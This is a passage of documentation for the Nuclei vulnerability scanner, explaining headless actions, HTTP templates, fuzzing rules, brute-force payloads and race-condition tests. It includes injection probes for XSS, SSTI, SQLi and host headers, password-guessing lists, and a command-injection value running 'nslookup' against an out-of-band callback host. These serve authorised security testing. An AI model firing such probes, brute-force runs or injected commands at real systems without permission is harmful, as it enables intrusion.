```
### waitfmp
WaitFMP waits for the First Meaningful Paint event, allowing users to proceed when content is visually ready.
```yaml
action: waitfmp
```
### waitdom
WaitDOM waits for the `DOMContentLoaded` event, indicating that the HTML has been loaded and parsed, but without waiting for stylesheets, images, and subframes to finish loading.
```yaml
action: waitdom
```
### waitload
WaitLoad waits until the entire page, including dependent resources like stylesheets and images, has been fully loaded.
```yaml
action: waitload
```
### waitidle
WaitIdle waits until the page has completely stopped making network requests and reaches a network-idle state, indicating that all resources have been loaded.
```yaml
action: waitidle
```
### waitstable
WaitStable waits until the page is stable for *N* duration *(default is `1s`)*.
```yaml
action: waitstable
args:
duration: 5s
```
### waitdialog
WaitDialog will wait for a JavaScript dialog (`alert`, `confirm`, `prompt`, or `onbeforeunload`) to be initialized and then automatically accept it.
```yaml
action: waitdialog
name: alert
args:
max-duration: 5s # (Optional. Default 10s.)
```
This action is useful for detecting triggered XSS payloads with a high level of accuracy and a low rate of false positives.
The `name` property MUST be explicitly defined to ensure the output variable is available for later use by `matchers` or `extractors` within your template. See the example [here](/templates/protocols/headless-examples#xss-detection).
**Output variables:**
* **NAME** *(boolean)*, an indicator that a JavaScript dialog was triggered.
* **NAME\_type** *(string)*, the dialog type (`alert`, `confirm`, `prompt`, or `onbeforeunload`).
* **NAME\_message** *(string)*, the message displayed by the dialog.
### getresource
GetResource returns the src attribute for an element.
```yaml
action: getresource
name: extracted-value-src
args:
by: xpath
xpath: /html/body/div[1]/div[3]/form/div[2]/div[1]/div[1]/div/div[2]/input
```
### extract
Extract extracts either the Text for an HTML Node, or an attribute as specified by the user.
The below code will extract the Text for the given XPath Selector Element, which can then also be matched upon by name `extracted-value` with matchers and extractors.
```yaml
action: extract
name: extracted-value
args:
by: xpath
xpath: /html/body/div[1]/div[3]/form/div[2]/div[1]/div[1]/div/div[2]/input
```
An attribute can also be extracted for an element. For example -
```yaml
action: extract
name: extracted-value-href
args:
by: xpath
xpath: /html/body/div[1]/div[3]/form/div[2]/div[1]/div[1]/div/div[2]/input
target: attribute
attribute: href
```
### setmethod
SetMethod overrides the method for the request.
```yaml
action: setmethod
args:
part: request
method: DELETE
```
### addheader
AddHeader adds a header to the requests / responses. This does not overwrite any pre-existing headers.
```yaml
action: addheader
args:
part: response # can be request too
key: Content-Security-Policy
value: "default-src * 'unsafe-inline' 'unsafe-eval' data: blob:;"
```
### setheader
SetHeader sets a header in the requests / responses.
```yaml
action: setheader
args:
part: response # can be request too
key: Content-Security-Policy
value: "default-src * 'unsafe-inline' 'unsafe-eval' data: blob:;"
```
### deleteheader
DeleteHeader deletes a header from requests / responses.
```yaml
action: deleteheader
args:
part: response # can be request too
key: Content-Security-Policy
```
### setbody
SetBody sets the body for a request / response.
```yaml
action: setbody
args:
part: response # can be request too
body: '{"success":"ok"}'
```
### waitevent
WaitEvent waits for an event to trigger on the page.
```yaml
action: waitevent
args:
event: 'Page.loadEventFired'
```
The list of events supported are listed [here](https://github.com/go-rod/rod/blob/master/lib/proto/definitions.go).
### keyboard
Keyboard simulates a single key-press on the keyboard.
```yaml
action: keyboard
args:
keys: '\r' # this simulates pressing enter key on keyboard
```
`keys` argument accepts key-codes.
### debug
Debug adds a delay of 5 seconds between each headless action and also shows a trace of all the headless events occurring in the browser.
> Note: Only use this for debugging purposes, don't use this in production templates.
```yaml
action: debug
```
### sleep
Sleep makes the browser wait for a specified duration in seconds. This is also useful for debugging purposes.
```yaml
action: sleep
args:
duration: 5
```
## Selectors
Selectors are how the nuclei headless engine identifies which element to execute an action on. Nuclei supports specifying selectors using a variety of options -
| Selector | Description |
| -------------------- | --------------------------------------------------- |
| `r` / `regex` | Element matches CSS Selector and Text Matches Regex |
| `x` / `xpath` | Element matches XPath selector |
| `js` | Return elements from a JS function |
| `search` | Search for a query (can be text, XPATH, CSS) |
| `selector` (default) | Element matches CSS Selector |
## Matchers / Extractor Parts
Valid `part` values supported by **Headless** protocol for Matchers / Extractor are -
| Value | Description |
| ----------------- | ------------------------------- |
| request | Headless Request |
| *action name* | Action names with stored values |
| raw / body / data | Final DOM response from browser |
## Example Headless Templates
An example headless template to automatically log in to DVWA is provided below -
```yaml
id: dvwa-headless-automatic-login
info:
name: DVWA Headless Automatic Login
author: pdteam
severity: high
headless:
- steps:
- args:
url: "{{BaseURL}}/login.php"
action: navigate
- action: waitload
- args:
by: xpath
xpath: /html/body/div/div[2]/form/fieldset/input
action: click
- action: waitload
- args:
by: xpath
value: admin
xpath: /html/body/div/div[2]/form/fieldset/input
action: text
- args:
by: xpath
xpath: /html/body/div/div[2]/form/fieldset/input[2]
action: click
- action: waitload
- args:
by: xpath
value: password
xpath: /html/body/div/div[2]/form/fieldset/input[2]
action: text
- args:
by: xpath
xpath: /html/body/div/div[2]/form/fieldset/p/input
action: click
- action: waitload
matchers:
- part: resp
type: word
words:
- "You have logged in as"
```
More complete examples are provided [here](/templates/protocols/headless-examples).
# Basic HTTP Protocol
Learn about using Basic HTTP with Nuclei
Nuclei offers extensive support for features related to the HTTP protocol. Both raw and model-based HTTP requests are supported, along with support for non-RFC-compliant client requests. Payloads can also be specified, and raw requests can be transformed based on payload values, along with many more capabilities shown later on this page.
HTTP requests start with an `http` block which specifies the start of the requests for the template.
```yaml
# Start the requests for the template right here
http:
```
## Method
Request method can be **GET**, **POST**, **PUT**, **DELETE**, etc. depending on the needs.
```yaml
# Method is the method for the request
method: GET
```
**Redirects**
Redirection conditions can be specified per template. By default, redirects are not followed. However, if desired, they can be enabled with `redirects: true` in the request details. A maximum of 10 redirects are followed by default, which should be good enough for most use cases. More fine-grained control over the number of redirects followed can be exercised using the `max-redirects` field.
An example of the usage:
```yaml
http:
- method: GET
path:
- "{{BaseURL}}/login.php"
redirects: true
max-redirects: 3
```
Currently redirects are defined per template, not per request.
## Path
The next part of the request is the request **path**. Dynamic variables can be placed in the path to modify its value at runtime.
Variables start with `{{` and end with `}}` and are case-sensitive.
`{{BaseURL}}` - replaced at runtime with the input URL as specified in the target file.
`{{RootURL}}` - replaced at runtime with the root URL as specified in the target file.
`{{Hostname}}` - replaced at runtime with the hostname, including the port, of the target.
`{{Host}}` - replaced at runtime with the input host as specified in the target file.
`{{Port}}` - replaced at runtime with the input port as specified in the target file.
`{{Path}}` - replaced at runtime with the input path as specified in the target file.
`{{File}}` - replaced at runtime with the input filename as specified in the target file.
`{{Scheme}}` - replaced at runtime with the protocol scheme as specified in the target file.
An example is provided below for the target [https://example.com:443/foo/bar.php](https://example.com:443/foo/bar.php):
| Variable | Value |
| -------------- | -------------------------------------------------------------------------- |
| `{{BaseURL}}` | [https://example.com:443/foo/bar.php](https://example.com:443/foo/bar.php) |
| `{{RootURL}}` | [https://example.com:443](https://example.com:443) |
| `{{Hostname}}` | example.com:443 |
| `{{Host}}` | example.com |
| `{{Port}}` | 443 |
| `{{Path}}` | /foo |
| `{{File}}` | bar.php |
| `{{Scheme}}` | https |
Some sample dynamic variable replacement examples:
```yaml
path: "{{BaseURL}}/.git/config"
# This path will be replaced on execution with BaseURL
# If BaseURL is set to https://abc.com then the
# path will get replaced to the following: https://abc.com/.git/config
```
Multiple paths can also be specified in one request; each will be requested against the target.
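For example (the second path is illustrative):
```yaml
path:
  - "{{BaseURL}}/.git/config"
  - "{{BaseURL}}/.svn/entries"
```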
## Headers
Headers can also be specified to be sent along with the requests. Headers are placed in form of key/value pairs. An example header configuration looks like this:
```yaml
# headers contain the headers for the request
headers:
# Custom user-agent header
User-Agent: Some-Random-User-Agent
# Custom request origin
Origin: https://google.com
```
## Body
Body specifies a body to be sent along with the request. For instance:
```yaml
# Body is a string sent along with the request
body: "{\"some random JSON\"}"
# Body is a string sent along with the request
body: "admin=test"
```
## Session
To maintain a cookie-based, browser-like session between multiple requests, cookies are reused by default. This is beneficial when you want to maintain a session between a series of requests to complete an exploit chain or to perform authenticated scans. If you need to disable this behavior, you can use the `disable-cookie` field.
```yaml
# disable-cookie accepts boolean input and false as default
disable-cookie: true
```
## Request Condition
Request conditions allow checking for conditions between multiple requests, enabling complex checks and exploits involving multiple HTTP requests to complete an exploit chain.
The functionality will be automatically enabled if DSL matchers/extractors contain numbers as a suffix with respective attributes.
For example, the attribute `status_code` will point to the effective status code of the current request/response pair. The status codes of previous responses are accessible by suffixing the attribute name with `_n`, where `n` is the 1-based index of the request. So if the template has four requests and we are currently at number 3:
* `status_code`: will refer to the response code of request number 3
* `status_code_1` and `status_code_2` will refer to the response codes of the sequential responses number one and two
For example, with `status_code_1`, `status_code_2`, and `body_2`:
```yaml
matchers:
- type: dsl
dsl:
- "status_code_1 == 404 && status_code_2 == 200 && contains((body_2), 'secret_string')"
```
Request conditions might require more memory, as all attributes of previous responses are kept in memory.
## Example HTTP Template
The final template file for the `.git/config` file mentioned above is as follows:
```yaml
id: git-config
info:
name: Git Config File
author: Ice3man
severity: medium
description: Searches for the pattern /.git/config on passed URLs.
http:
- method: GET
path:
- "{{BaseURL}}/.git/config"
matchers:
- type: word
words:
- "[core]"
```
More complete examples are provided [here](/templates/protocols/http/basic-http-examples).
# Connection Tampering
Learn more about using HTTP pipelining and connection pooling with Nuclei
### Pipelining
HTTP pipelining support has been added, which allows multiple HTTP requests to be sent on the same connection, inspired by [http-desync-attacks-request-smuggling-reborn](https://portswigger.net/research/http-desync-attacks-request-smuggling-reborn).
Before running HTTP-pipelining-based templates, make sure the target supports HTTP pipelining; otherwise the nuclei engine falls back to the standard HTTP request engine.
If you want to confirm that a given domain or list of subdomains supports HTTP pipelining, [httpx](https://github.com/projectdiscovery/httpx) has a `-pipeline` flag to do so.
An example configuration showing the pipelining attributes of nuclei:
```yaml
unsafe: true
pipeline: true
pipeline-concurrent-connections: 40
pipeline-requests-per-connection: 25000
```
An example template demonstrating the pipelining capabilities of nuclei is provided below:
```yaml
id: pipeline-testing
info:
name: pipeline testing
author: pdteam
severity: info
http:
- raw:
- |+
GET /{{path}} HTTP/1.1
Host: {{Hostname}}
Referer: {{BaseURL}}
attack: batteringram
payloads:
path: path_wordlist.txt
unsafe: true
pipeline: true
pipeline-concurrent-connections: 40
pipeline-requests-per-connection: 25000
matchers:
- type: status
part: header
status:
- 200
```
### Connection pooling
While earlier versions of nuclei did not do connection pooling, users can now configure templates to either use HTTP connection pooling or not. This allows for faster scanning based on requirements.
To enable connection pooling in a template, the `threads` attribute can be defined with the number of threads you want to use in the payloads section.
The `Connection: Close` header cannot be used in an HTTP connection pooling template; otherwise the engine will fail and fall back to standard HTTP requests.
An example template using HTTP connection pooling:
```yaml
id: fuzzing-example
info:
name: Connection pooling example
author: pdteam
severity: info
http:
- raw:
- |
GET /protected HTTP/1.1
Host: {{Hostname}}
Authorization: Basic {{base64('admin:§password§')}}
attack: batteringram
payloads:
password: password.txt
threads: 40
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "Unique string"
part: body
```
# Fuzzing Examples
Review some examples of fuzzing with Nuclei
## Basic SSTI Template
A simple template to discover `{{*}}` type SSTI vulnerabilities.
```yaml
id: fuzz-reflection-ssti
info:
name: Basic Reflection Potential SSTI Detection
author: pdteam
severity: low
variables:
first: "{{rand_int(10000, 99999)}}"
second: "{{rand_int(10000, 99999)}}"
result: "{{to_number(first)*to_number(second)}}"
http:
- pre-condition:
- type: dsl
dsl:
- 'method == "GET"' # only run on GET URLs
payloads:
reflection:
- '{{concat("{{", "§first§*§second§", "}}")}}'
fuzzing:
- part: query
type: postfix
mode: multiple
fuzz:
- "{{reflection}}"
matchers:
- type: word
part: body
words:
- "{{result}}"
```
## Basic XSS Template
A simple template to discover XSS probe reflection in HTML pages.
```yaml
id: fuzz-reflection-xss
info:
name: Basic Reflection Potential XSS Detection
author: pdteam
severity: low
http:
- pre-condition:
- type: dsl
dsl:
- 'method == "GET"' # only run on GET URLs
payloads:
reflection:
- "6842'\"><9967"
stop-at-first-match: true
fuzzing:
- part: query
type: postfix
mode: single
fuzz:
- "{{reflection}}"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "{{reflection}}"
- type: word
part: header
words:
- "text/html"
```
## Basic OpenRedirect Template
A simple template to discover open-redirect issues.
```yaml
id: fuzz-open-redirect
info:
name: Basic Open Redirect Detection
author: pdteam
severity: low
http:
- pre-condition:
- type: dsl
dsl:
- 'method == "GET"' # only run on GET URLs
payloads:
redirect:
- "https://example.com"
fuzzing:
- part: query
type: replace
mode: single
keys-regex:
- "redirect.*"
fuzz:
- "{{redirect}}"
matchers-condition: and
matchers:
- type: word
part: header
words:
- "{{redirect}}"
- type: status
status:
- 301
- 302
- 307
```
## Basic Path Based SQLi
An example template to discover path-based SQLi issues by appending a SQL injection probe to the request path (a minimal sketch; the payload and pre-condition shown are illustrative):
```yaml
http:
    # pre-condition to determine if the template should be executed
  - pre-condition:
      - type: dsl
        dsl:
          - 'method == "GET"' # only run if method is GET
    # fuzzing rules
    fuzzing:
      - part: path # this rule will be applied to the request path
        type: postfix # postfix type (i.e., payload is appended to the existing value)
        mode: single # single mode (i.e., one value is fuzzed at a time)
        fuzz:
          - "'OR1=1" # SQL injection probe appended to the path
```
## Basic Host Header Injection
A simple template to discover host header injection issues.
```yaml
http:
  # pre-condition to determine if the template should be executed
  - pre-condition:
      - type: dsl
        dsl:
          - 'method == "POST"' # only run if method is POST
          - 'contains(path,"reset")' # only run if path contains reset word
        condition: and

    # fuzzing rules
    fuzzing:
      - part: header # This rule will be applied to the header
        type: replace # replace the type of rule (i.e., existing values will be replaced with payload)
        mode: multiple # multiple mode (i.e., all existing values will be replaced/used at once)
        fuzz:
          X-Forwarded-For: "{{domain}}" # here {{domain}} is attacker-controlled server
          X-Forwarded-Host: "{{domain}}"
          Forwarded: "{{domain}}"
          X-Real-IP: "{{domain}}"
          X-Original-URL: "{{domain}}"
          X-Rewrite-URL: "{{domain}}"
          Host: "{{domain}}"
```
## Blind SSRF OOB Detection
A simple template to detect blind SSRF in known parameters using interactsh with HTTP fuzzing.
```yaml
id: fuzz-ssrf

info:
  name: Basic Blind SSRF Detection
  author: pdteam
  severity: low

http:
  - pre-condition:
      - type: dsl
        dsl:
          - 'method == "GET"' # only run on GET URLs

    payloads:
      redirect:
        - "{{interactsh-url}}"

    fuzzing:
      - part: query
        type: replace
        mode: single
        keys:
          - "dest"
          - "redirect"
          - "uri"
          - "path"
          - "continue"
          - "url"
          - "window"
          - "next"
          - "data"
          - "reference"
          - "site"
          - "html"
          - "val"
          - "validate"
          - "domain"
          - "callback"
          - "return"
          - "page"
          - "feed"
          - "host"
          - "port"
          - "to"
          - "out"
          - "view"
          - "dir"
          - "show"
          - "navigation"
          - "open"
        fuzz:
          - "https://{{redirect}}"

    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"
```
## Blind CMDi OOB based detection
A simple template to detect blind CMDi using interactsh.
```yaml
id: fuzz-cmdi

info:
  name: Basic Blind CMDI Detection
  author: pdteam
  severity: low

http:
  - method: GET
    path:
      - "{{BaseURL}}"

    payloads:
      redirect:
        - "{{interactsh-url}}"

    fuzzing:
      - fuzz: # defaults apply (part: query, type: replace, mode: multiple)
          - "nslookup {{redirect}}"

    matchers:
      - type: word
        part: interactsh_protocol # Confirms the DNS Interaction
        words:
          - "dns"
```
# Fuzzing Overview
Learn about fuzzing HTTP requests with Nuclei
Nuclei supports fuzzing of HTTP requests based on rules defined in the `fuzzing` section of the HTTP request. This allows creating templates for generic web application vulnerabilities like SQLi, SSRF, CMDi, etc. without any prior information about the target, like a classic web fuzzer. We call this concept **Fuzzing for Unknown Vulnerabilities**.
## pre-condition
More often than not, we want to only attempt fuzzing on those requests where it makes sense. For example,
* Fuzz Body When Body is Present
* Ignore PreFlight and CONNECT requests
and so on. Nuclei v3.2.4 introduced a new `pre-condition` section containing conditions that determine when a fuzzing template should be executed.
pre-condition can be considered a twin of [matchers](/templates/reference/matchers) in nuclei. It supports all matcher types, including DSL; the only difference is the purpose it serves.
For example, to only execute the template on POST requests with a non-empty body, you can use the following filter.
```yaml
- pre-condition:
    - type: dsl
      dsl:
        - 'method == "POST"'
        - 'len(body) > 0'
      condition: and
```
Currently, only request data like header, host, input, method, and path is available; response data will become available once support for loading the response along with the request is added.
When writing or executing a template, you can use the `-v -svd` flags to see all variables available in filters before applying the filter.
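For example, a run like the following (hypothetical template and target names) prints the variable dump for each sent request:
```bash
nuclei -t fuzz-template.yaml -u https://example.com -v -svd
```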
### Part
Part specifies what part of the request should be fuzzed based on the specified rules. Available options for this parameter are -
**query** (`default`) - fuzz query parameters for URL
```yaml
fuzzing:
  - part: query # fuzz parameters in URL query
```
**path** - fuzz path parameters for requests
```yaml
fuzzing:
  - part: path # fuzz path parameters
```
**header** - fuzz header parameters for requests
```yaml
fuzzing:
  - part: header # fuzz headers
```
**cookie** - fuzz cookie parameters for requests
```yaml
fuzzing:
  - part: cookie # fuzz cookies
```
**body** - fuzz body parameters for requests
```yaml
fuzzing:
  - part: body # fuzz parameters in body
```
### Type
Type specifies the type of replacement to perform for the fuzzing rule value. Available options for this parameter are -
1. **replace** (`default`) - replace the value with payload
2. **prefix** - prefix the value with payload
3. **postfix** - postfix the value with payload
4. **infix** - infix the value with payload (place in between)
5. **replace-regex** - replace the value with payload using regex
```yaml
fuzzing:
  - part: query
    type: postfix # Fuzz query and postfix payload to params
```
### Key-Value Abstraction
In an HTTP request, there are various parts like query, path, headers, cookies, and body, and each part comes in various formats. For example, the query part is a set of key-value pairs, the path part is a list of values, and the body can be JSON, XML, or form-data.
To effectively abstract these parts and allow them to be fuzzed, Nuclei exposes these values as `key` and `value` pairs. This allows users to fuzz based on the key or value of the request part.
For example, the sample HTTP request below can be abstracted into key-value pairs as shown.
```http
POST /reset-password?token=x0x0x0&source=app HTTP/1.1
Host: 127.0.0.1:8082
User-Agent: Go-http-client/1.1
Cookie: PHPSESSID=1234567890
Content-Length: 23
Content-Type: application/json
Accept-Encoding: gzip
Connection: close

{"password":"12345678"}
```
* **`part: Query`**
| key | value |
| ------ | ------ |
| token | x0x0x0 |
| source | app |
* **`part: Path`**
| key | value |
| ----- | --------------- |
| value | /reset-password |
* **`part: Header`**
| key | value |
| --------------- | ------------------ |
| Host | 127.0.0.1:8082 |
| User-Agent | Go-http-client/1.1 |
| Content-Length | 23 |
| Content-Type | application/json |
| Accept-Encoding | gzip |
| Connection | close |
* **`part: Cookie`**
| key | value |
| --------- | ---------- |
| PHPSESSID | 1234567890 |
* **`part: Body`**
| key | value |
| -------- | -------- |
| password | 12345678 |
**Note:** XML, JSON, Form, Multipart-FormData will be in kv format, but if the Body is binary or in any other format, the entire Body will be represented as a single key-value pair with key as `value` and value as the entire Body.
| key | value |
| ----- | -------------------------- |
| value | "\x08\x96\x01\x12\x07\x74" |
This abstraction really levels up the game since you only need to write a single rule for the Body, and it will be applied to all formats. For example, if you check for SQLi in body values, a single rule will work on all formats, i.e., JSON, XML, Form, Multipart-FormData, etc.
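As an illustration, the sketch below uses a single `part: body` rule; thanks to the abstraction, the same rule fuzzes the `password` value whether the body arrives as JSON, XML, form, or multipart data (the payload shown is just a probe placeholder):
```yaml
fuzzing:
  - part: body
    type: postfix
    mode: single
    fuzz:
      - "'"
```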
### Mode
Mode specifies the mode in which to perform the replacements. Available modes are -
1. **multiple** (`default`) - replace all values at once
2. **single** - replace one value at a time
```yaml
fuzzing:
  - part: query
    type: postfix
    mode: multiple # Fuzz query postfixing payloads to all parameters at once
```
> **Note**: default values are set/used when other options are not defined.
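For example, the following minimal rule (a sketch assuming an `injection` payload list is defined as in the examples above) relies entirely on those defaults, i.e. it is equivalent to `part: query`, `type: replace`, `mode: multiple`:
```yaml
fuzzing:
  - fuzz:
      - "{{injection}}"
```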
### Component Data Filtering
Multiple filters are supported to restrict the scope of fuzzing to only interesting parameter keys and values. Nuclei HTTP Fuzzing engine converts request parts into Keys and Values which then can be filtered by their related options.
The following filter fields are supported -
1. **keys** - list of parameter names to fuzz (exact match)
2. **keys-regex** - list of parameter regex to fuzz
3. **values** - list of value regex to fuzz
These filters can be used in combination to run highly targeted fuzzing based on the parameter input. A few examples of such filtering are provided below.
```yaml
# fuzzing command injection based on parameter name value
fuzzing:
  - part: query
    type: replace
    mode: single
    keys:
      - "daemon"
      - "upload"
      - "dir"
      - "execute"
      - "download"
      - "log"
      - "ip"
      - "cli"
      - "cmd"
```
```yaml
# fuzzing openredirects based on parameter name regex
fuzzing:
  - part: query
    type: replace
    mode: single
    keys-regex:
      - "redirect.*"
```
```yaml
# fuzzing ssrf based on parameter value regex
fuzzing:
  - part: query
    type: replace
    mode: single
    values:
      - "https?://.*"
```
### Fuzz
Fuzz specifies the values to replace with a `type` for a parameter. It supports payloads, DSL functions, etc., and allows users to fully utilize the existing nuclei feature set for fuzzing purposes.
```yaml
# fuzz section for xss fuzzing with stop-at-first-match
payloads:
  reflection:
    - "6842'\"><9967"

stop-at-first-match: true
fuzzing:
  - part: query
    type: postfix
    mode: single
    fuzz:
      - "{{reflection}}"
```
```yaml
# using interactsh-url placeholder for oob testing
payloads:
  redirect:
    - "{{interactsh-url}}"

fuzzing:
  - part: query
    type: replace
    mode: single
    keys:
      - "dest"
      - "redirect"
      - "uri"
    fuzz:
      - "https://{{redirect}}"
```
```yaml
# using template-level variables for SSTI testing
variables:
  first: "{{rand_int(10000, 99999)}}"
  second: "{{rand_int(10000, 99999)}}"
  result: "{{to_number(first)*to_number(second)}}"

http:
  ...
    payloads:
      reflection:
        - '{{concat("{{", "§first§*§second§", "}}")}}'

    fuzzing:
      - part: query
        type: postfix
        mode: multiple
        fuzz:
          - "{{reflection}}"
```
## Example **Fuzzing** template
An example template for fuzzing XSS vulnerabilities is provided below.
```yaml
id: fuzz-reflection-xss

info:
  name: Basic Reflection Potential XSS Detection
  author: pdteam
  severity: low

http:
  - pre-condition:
      - type: dsl
        dsl:
          - 'method == "GET"' # only run if method is GET

    payloads:
      reflection:
        - "6842'\"><9967"

    stop-at-first-match: true
    fuzzing:
      - part: query
        type: postfix
        mode: single
        fuzz:
          - "{{reflection}}"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "{{reflection}}"

      - type: word
        part: header
        words:
          - "text/html"
```
More complete examples are provided [here](/templates/protocols/http/fuzzing-examples)
# HTTP Payloads
Learn about bruteforcing HTTP requests using payloads with Nuclei
## Overview
Nuclei engine supports brute forcing any value/component of HTTP requests using the payloads module, which allows running various types of payloads in multiple formats. It's possible to define placeholders with simple keywords (or using brackets `{{helper_function(variable)}}` in case mutator functions are needed), and perform **batteringram**, **pitchfork** and **clusterbomb** attacks.
The **wordlist** for these attacks needs to be defined during the request definition under the `payloads` field, with a name matching the keyword. Nuclei supports both file-based and in-template wordlists. Finally, all DSL functionalities are fully available and supported, and can be used to manipulate the final values.
Payloads are defined using a variable name and can be referenced in the request between `{{ }}` markers.
### Difference between **HTTP Payloads** and **HTTP Fuzzing**
While both may sound similar, the major difference between **Fuzzing** and **Payloads/BruteForce** is that Fuzzing is a superset of Payloads/BruteForce and has extra features related to finding Unknown Vulnerabilities while Payloads is just plain brute forcing of values with a given attack type and set of payloads.
## Examples
An example of using payloads with a local wordlist:
```yaml
# HTTP Intruder fuzzing using local wordlist.
payloads:
  paths: params.txt
  header: local.txt
```
An example of using payloads with in-template wordlist support:
```yaml
# HTTP Intruder fuzzing using in template wordlist.
payloads:
  password:
    - admin
    - guest
    - password
```
**Note:** be careful when selecting the attack type, as unexpected input will break the template.
For example, if you use `clusterbomb` or `pitchfork` as the attack type and define only one variable in the payload section, the template will fail to compile, as `clusterbomb` and `pitchfork` expect more than one variable to be used in the template.
## Attack mode
Nuclei engine supports multiple attack types, including `batteringram` as the default type, which is generally used to fuzz a single parameter, and `clusterbomb` and `pitchfork` for fuzzing multiple parameters, which work the same as the classical Burp Intruder attack types.
| **Type** | batteringram | pitchfork | clusterbomb |
| ----------- | ------------ | --------- | ----------- |
| **Support** | ✔ | ✔ | ✔ |
### batteringram
The battering ram attack type places the same payload value in all positions. It uses only one payload set. It loops through the payload set and replaces all positions with the payload value.
### pitchfork
The pitchfork attack type uses one payload set for each position. It places the first payload in the first position, the second payload in the second position, and so on.
It then loops through all payload sets at the same time. The first request uses the first payload from each payload set, the second request uses the second payload from each payload set, and so on.
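For instance, the following sketch (hypothetical wordlist paths) pairs each username with the password at the same index:
```yaml
payloads:
  username: wordlists/usernames.txt
  password: wordlists/passwords.txt
attack: pitchfork # first username with first password, second with second, and so on
```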
### clusterbomb
The cluster bomb attack tries all different combinations of payloads. It still puts the first payload in the first position, and the second payload in the second position. But when it loops through the payload sets, it tries all combinations.
This attack type is useful for a brute-force attack. Load a list of commonly used usernames in the first payload set, and a list of commonly used passwords in the second payload set. The cluster bomb attack will then try all combinations.
More details [here](https://www.sjoerdlangkemper.nl/2017/08/02/burp-intruder-attack-types/).
## Attack Mode Example
An example of using the `clusterbomb` attack to fuzz:
```yaml
http:
  - raw:
      - |
        POST /?file={{path}} HTTP/1.1
        User-Agent: {{header}}
        Host: {{Hostname}}

    attack: clusterbomb # Defining HTTP fuzz attack type
    payloads:
      path: helpers/wordlists/prams.txt
      header: helpers/wordlists/header.txt
```
# HTTP Payloads Examples
Review some HTTP payload examples for Nuclei
## HTTP Intruder Bruteforcing
This template makes a defined POST request in raw format with in-template payloads, running the `clusterbomb` intruder and checking for a string match against the response.
```yaml
id: multiple-raw-example

info:
  name: Test RAW Template
  author: pdteam
  severity: info

# HTTP Intruder bruteforcing with in template payload support.
http:
  - raw:
      - |
        POST /?username=§username§&paramb=§password§ HTTP/1.1
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5)
        Host: {{Hostname}}
        another_header: {{base64('§password§')}}
        Accept: */*

        body=test

    payloads:
      username:
        - admin

      password:
        - admin
        - guest
        - password
        - test
        - 12345
        - 123456

    attack: clusterbomb # Available: batteringram,pitchfork,clusterbomb

    matchers:
      - type: word
        words:
          - "Test is test matcher text"
```
## BruteForcing multiple requests
This template makes defined requests in raw format with wordlist-based payloads, running the `clusterbomb` intruder and checking for a string match against the response.
```yaml
id: multiple-raw-example

info:
  name: Test RAW Template
  author: pdteam
  severity: info

http:
  - raw:
      - |
        POST /?param_a=§param_a§&paramb=§param_b§ HTTP/1.1
        User-Agent: §param_a§
        Host: {{Hostname}}
        another_header: {{base64('§param_b§')}}
        Accept: */*

        admin=test
      - |
        DELETE / HTTP/1.1
        User-Agent: nuclei
        Host: {{Hostname}}

        {{sha256('§param_a§')}}
      - |
        PUT / HTTP/1.1
        Host: {{Hostname}}

        {{html_escape('§param_a§')}} + {{hex_encode('§param_b§')}}

    attack: clusterbomb # Available types: batteringram,pitchfork,clusterbomb
    payloads:
      param_a: payloads/prams.txt
      param_b: payloads/paths.txt

    matchers:
      - type: word
        words:
          - "Test is test matcher text"
```
## Authenticated Bruteforcing
This template makes subsequent HTTP requests with the defined requests, maintaining the session between each request and checking for a string match against the response.
```yaml
id: multiple-raw-example

info:
  name: Test RAW Template
  author: pdteam
  severity: info

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        Origin: {{BaseURL}}
      - |
        POST /testing HTTP/1.1
        Host: {{Hostname}}
        Origin: {{BaseURL}}

        testing=parameter

    cookie-reuse: true # Cookie-reuse maintains the session between all requests, like a browser.
    matchers:
      - type: word
        words:
          - "Test is test matcher text"
```
# Race Conditions
Learn about using race conditions with Nuclei
Race conditions are another class of bugs not easily automated via traditional tooling. Burp Suite introduced a gate mechanism in Turbo Intruder, where all the bytes of all requests except the last one are sent first, and the final bytes are then sent together for all requests, synchronizing the send event.
We have implemented the **Gate** mechanism in the nuclei engine and allow it to be used via templates, which makes testing for this specific bug class simple and portable.
To enable race condition checks within a template, the `race` attribute can be set to `true`, and `race_count` defines the number of simultaneous requests you want to initiate.
Below is an example template where the same request is repeated 10 times using the gate logic.
```yaml
id: race-condition-testing

info:
  name: Race condition testing
  author: pdteam
  severity: info

http:
  - raw:
      - |
        POST /coupons HTTP/1.1
        Host: {{Hostname}}

        promo_code=20OFF

    race: true
    race_count: 10

    matchers:
      - type: status
        part: header
        status:
          - 200
```
You can simply replace the `POST` request with any suspected vulnerable request and change the `race_count` as per your need, and it's ready to run.
```bash
nuclei -t race.yaml -target https://api.target.com
```
**Multi request race condition testing**
For scenarios where multiple requests need to be sent to exploit the race condition, we can make use of threads.
```yaml
threads: 5
race: true
```
`threads` is the total number of requests you want to make with the template to perform race condition testing.
Below is an example template where multiple (5) unique requests will be sent at the same time using the gate logic.
```yaml
id: multi-request-race

info:
  name: Race condition testing with multiple requests
  author: pd-team
  severity: info

http:
  - raw:
      - |
        POST / HTTP/1.1
        Pragma: no-cache
        Host: {{Hostname}}
        Cache-Control: no-cache, no-transform
        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0

        id=1
      - |
        POST / HTTP/1.1
        Pragma: no-cache
        Host: {{Hostname}}
        Cache-Control: no-cache, no-transform
        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0

        id=2
      - |
        POST / HTTP/1.1
        Pragma: no-cache
        Host: {{Hostname}}
        Cache-Control: no-cache, no-transform
        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0

        id=3
      - |
        POST / HTTP/1.1
        Pragma: no-cache
        Host: {{Hostname}}
        Cache-Control: no-cache, no-transform
        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0

        id=4
      - |
        POST / HTTP/1.1
        Pragma: no-cache
        Host: {{Hostname}}
        Cache-Control: no-cache, no-transform
